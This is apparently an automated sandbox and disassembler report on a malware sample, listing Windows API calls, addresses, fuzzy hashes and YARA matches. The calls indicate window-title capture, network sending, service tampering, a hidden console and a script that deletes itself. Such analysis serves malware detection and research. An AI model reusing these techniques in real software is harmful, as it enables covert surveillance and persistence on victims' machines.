                                                                                • Instruction ID: d5ee3af90d3056cccc62c88dd6abffac78c87d3bb6c9dddf1d1336f411b7ca2d
                                                                                • Opcode Fuzzy Hash: 820c01e33afeab3fc0483e6c9ee435281bf1bbf0289cdfb463ea79f6631d800d
                                                                                • Instruction Fuzzy Hash: 0821D691B80304A7DB24B6782C0AE7F728E8BC1751F40457AB916D72C3EF2D9D1683A9
                                                                                APIs
                                                                                • SetEvent.KERNEL32(?,?), ref: 007850D8
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00785188
                                                                                • TranslateMessage.USER32(?), ref: 00785197
                                                                                • DispatchMessageA.USER32(?), ref: 007851A2
                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 0078525A
                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00785292
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                • String ID:
                                                                                • API String ID: 2956720200-0
                                                                                • Opcode ID: 822d3e8355dfe554be3e3a6cb7f23e7c77d447b8df2c12cbc1a70b6fed0e93d0
                                                                                • Instruction ID: de182435a43b848de697f8cad83a7c8f835d8c7f16c04b009f596d32f3c47e2b
                                                                                • Opcode Fuzzy Hash: 822d3e8355dfe554be3e3a6cb7f23e7c77d447b8df2c12cbc1a70b6fed0e93d0
                                                                                • Instruction Fuzzy Hash: F6219171944305ABCA14FB74DD4E9AE7BA8AB85711F400A28F91283192EF39DA09CB52
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: SystemTimes$Sleep__aulldiv
                                                                                • String ID:
                                                                                • API String ID: 188215759-0
                                                                                • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                • Instruction ID: 3b66203fd79088dfadce72ddbf0b0401c54eb4bd27628439374ba0e7aa9136f0
                                                                                • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                • Instruction Fuzzy Hash: 9D215E725083009BC304DF65D98589FB7E8EFC8654F044A2EF589D3251EA34EA49CB63
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: SystemTimes$Sleep__aulldiv
                                                                                • String ID:
                                                                                • API String ID: 188215759-0
                                                                                • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                • Instruction ID: f905d1a8f291593e48d52dd2bd89694f9d1dcb5fc9edefeb253359b98a442128
                                                                                • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                • Instruction Fuzzy Hash: 87213272509305AFC704DF68D88589FB7E8EFC8754F044A2DF58597251EA34EA09CBA3
                                                                                APIs
                                                                                  • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                  • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                  • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$SleepText$ForegroundLength
                                                                                • String ID: [ $ ]
                                                                                • API String ID: 3309952895-93608704
                                                                                • Opcode ID: 8a8182bc4af9811f9c16057955931611a5d35cec57aaaf681bb90f2a4089e852
                                                                                • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                • Opcode Fuzzy Hash: 8a8182bc4af9811f9c16057955931611a5d35cec57aaaf681bb90f2a4089e852
                                                                                • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002), ref: 0079A063
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002), ref: 0079A077
                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0079A084
                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0079A0B9
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$Open$ChangeCloseConfigHandleManager
                                                                                • String ID:
                                                                                • API String ID: 110783151-0
                                                                                • Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                                                • Instruction ID: 6fa5a73d4b6ba11ce143f1edf9cfbd80dbeb1bca7a7dd0b4112387e0c411d4a1
                                                                                • Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                                                • Instruction Fuzzy Hash: 2101D631149314BADA215B2CBC4EE7B3A6CDB42771F100225F522921D2EA58CD0191B2
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041B60C
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandlePointerWrite
                                                                                • String ID:
                                                                                • API String ID: 3604237281-0
                                                                                • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0079B90C,00000000,00000000,?), ref: 0079B835
                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000000,0079B90C,00000000,00000000,?,?,0078A270), ref: 0079B852
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,0079B90C,00000000,00000000,?,?,0078A270), ref: 0079B866
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,0079B90C,00000000,00000000,?,?,0078A270), ref: 0079B873
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandlePointerWrite
                                                                                • String ID:
                                                                                • API String ID: 3604237281-0
                                                                                • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                • Instruction ID: 8dd89a142aed869d27d01aa8ffbe3bc3d3809f3c941656d4f51e1476ed9c200c
                                                                                • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                • Instruction Fuzzy Hash: 0501F571209214BFEA144E24BDC9E7B739CEB8A3B9F100639FA61C22D1D765CC0586B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                APIs
                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                  • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                  • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                • String ID:
                                                                                • API String ID: 737400349-0
                                                                                • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 3177248105-0
                                                                                • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,007C741E,?,00000000,00000000,00000000,?,007C774A,00000006,0045D330), ref: 007C74A9
                                                                                • GetLastError.KERNEL32(?,007C741E,?,00000000,00000000,00000000,?,007C774A,00000006,0045D330,0045D328,0045D330,00000000,00000364,?,007C71F8), ref: 007C74B5
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007C741E,?,00000000,00000000,00000000,?,007C774A,00000006,0045D330,0045D328,0045D330,00000000), ref: 007C74C3
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 3177248105-0
                                                                                • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                • Instruction ID: 36deb2a692c1a14f6afd77ec48ddffc8399fb169eceecca860e75b06281b26de
                                                                                • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                • Instruction Fuzzy Hash: D8018432619366ABC7394A69AC44F567F98AB05BA2B11057CF906D7281DA28D900CEE4
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 3919263394-0
                                                                                • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00783D5A,00465324), ref: 0079B89A
                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00783D5A,00465324), ref: 0079B8AE
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00783D5A,00465324), ref: 0079B8D3
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00783D5A,00465324), ref: 0079B8E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 3919263394-0
                                                                                • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                • Instruction ID: d4d5e8a026202857eddebc3c87a9897228275147c1553e96471a877526412c34
                                                                                • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                • Instruction Fuzzy Hash: EDF096B5245309BFE6112B24FC89FBF375CDB866B6F100679F902A2192DA698C059171
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                                • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MetricsSystem
                                                                                • String ID:
                                                                                • API String ID: 4116985748-0
                                                                                • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                                APIs
                                                                                • AllocConsole.KERNEL32 ref: 0079C120
                                                                                • GetConsoleWindow.KERNEL32 ref: 0079C126
                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0079C139
                                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0079C15E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Console$Window$AllocOutputShow
                                                                                • String ID:
                                                                                • API String ID: 4067487056-0
                                                                                • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                • Instruction ID: adc24bd4d6064eadc80f50d7e767207e937e7c11fed4f8c29b11510eb3190490
                                                                                • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                • Instruction Fuzzy Hash: 5C01F4B1980304FFDA10FBF19D4FF9D77ACAB14701F50042AB644E7193E6ADD6444699
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,00799A81,00000000,00000000), ref: 00799E34
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00799A81,00000000,00000000), ref: 00799E49
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,00799A81,00000000,00000000), ref: 00799E56
                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00799A81,00000000,00000000), ref: 00799E61
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$Open$CloseHandleManagerStart
                                                                                • String ID:
                                                                                • API String ID: 2553746010-0
                                                                                • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                                • Instruction ID: 5ffacbdec20259a9da46d44c7e58906cadef66af947c381caeef7b67c91fca39
                                                                                • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                                • Instruction Fuzzy Hash: 50F08972545318BFE611AB34BC88EBF2AACDF85BA2B000439F50192191CB68CC06D675
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B70,00784AA6,00000001,?,?,00000000,00475B70,00781A5A), ref: 00784D54
                                                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,00781A5A), ref: 00784D60
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,00781A5A), ref: 00784D6B
                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,00781A5A), ref: 00784D74
                                                                                  • Part of subcall function 0079A8ED: GetLocalTime.KERNEL32(00000000), ref: 0079A907
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                • String ID:
                                                                                • API String ID: 2993684571-0
                                                                                • Opcode ID: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                                                • Instruction ID: fab97a5fd9f72ef2a2f11505d6e8a8e0dbbe75ee3def591f8a54871d8b24b0a0
                                                                                • Opcode Fuzzy Hash: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                                                • Instruction Fuzzy Hash: 23F0E075944710BFDB2137749D0FA7A7F98EB01311F1009AAF942836B2D56C88908766
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 0079C0E0
                                                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?), ref: 0079C0ED
                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0079C0FA
                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0079C10D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                • String ID:
                                                                                • API String ID: 3024135584-0
                                                                                • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                • Instruction ID: bb6be0cd1b17b42927068b99f002f17a129d98c665d9e8bfb5e420f31393757d
                                                                                • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                • Instruction Fuzzy Hash: F9E04F62204348BBD31437F5BC8ECAB3B6CE784613B101535F61290393EA7488448A75
                                                                                APIs
                                                                                • FindResourceA.KERNEL32(0046BC64,0000000A,00000000), ref: 0079A8B7
                                                                                • LoadResource.KERNEL32(00000000,?,?,0078E3EA,00000000), ref: 0079A8CB
                                                                                • LockResource.KERNEL32(00000000,?,?,0078E3EA,00000000), ref: 0079A8D2
                                                                                • SizeofResource.KERNEL32(00000000,?,?,0078E3EA,00000000), ref: 0079A8E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                • Instruction ID: 532c6c311b4ddb67321f8d2502c568c30474b7ebe285ccfba0461b0f0728a59b
                                                                                • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                • Instruction Fuzzy Hash: 6CE09A7A604710ABCB211BA5BC8CD477E39E786B637144036F90592331DA359851DA59
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-
                                                                                • API String ID: 1302938615-2137968064
                                                                                • Opcode ID: bb05039bd10173984d8ac256ef46a28b781231ebc573ca9b653a1b6ddea24a85
                                                                                • Instruction ID: 031c9f7656bfe189ecc94f3b98d22bc5a0258bcb5dbf98bdd7ba637d3823a848
                                                                                • Opcode Fuzzy Hash: bb05039bd10173984d8ac256ef46a28b781231ebc573ca9b653a1b6ddea24a85
                                                                                • Instruction Fuzzy Hash: 4791E770D04249BFCF20EF68C8447EDBBB1EF55324F18825AE865E7291E63C9A45CB52
                                                                                APIs
                                                                                • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                                Strings
                                                                                Memory Dump Source
